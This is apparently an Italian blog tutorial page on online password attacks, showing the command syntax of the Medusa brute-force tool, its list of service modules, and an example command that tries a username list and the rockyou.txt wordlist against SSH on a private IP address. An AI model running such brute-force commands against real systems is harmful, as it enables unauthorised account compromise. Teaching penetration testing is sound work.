Password Attack parte 2

ON-LINE Attack

Vediamo in questa scheda come usare tool per attacchi brute-force e con dizionari on-line, analizzando come primo esempio medusa.

La sintassi di Medusa è la seguente:
medusa -h HOST -u USERNAME -p PASSWORD -O OUTPUTFILE -M MODULENAME -n PORTNUMBER
oppure è possibile appoggiarsi a file testuali con la seguente sintassi:
medusa -H HOSTLIST -U USERLIST -P PASSWORDLIST -O OUTPUTFILE -M MODULENAME -n PORTNUMBER

I moduli a disposizione di medusa sono i seguenti:

  • cvs
  • ftp
  • http
  • imap
  • mssql
  • mysql
  • nntp
  • pcanywhere
  • pop3
  • postgresql
  • rexec
  • rlogin
  • rsh
  • smbnt
  • smtp
  • ssh
  • svn
  • telnet
  • vmauth
  • vnc
  • web-form

Volendo effettuare un attacco login ssh per il server che risponde all’IP 192.168.188.42 utilizzando un file per l’elenco utenti ed uno per le password possiamo scrivere:
medusa -h 192.168.188.42 -U Nomi -P rockyou.txt -M ssh -n 22

Nella schermata vediamo come Medusa per il primo utente della lista “michal” effettua uno dopo l’altro i tentativi di login tramite ssh.

Leave a Reply

Your email address will not be published. Required fields are marked *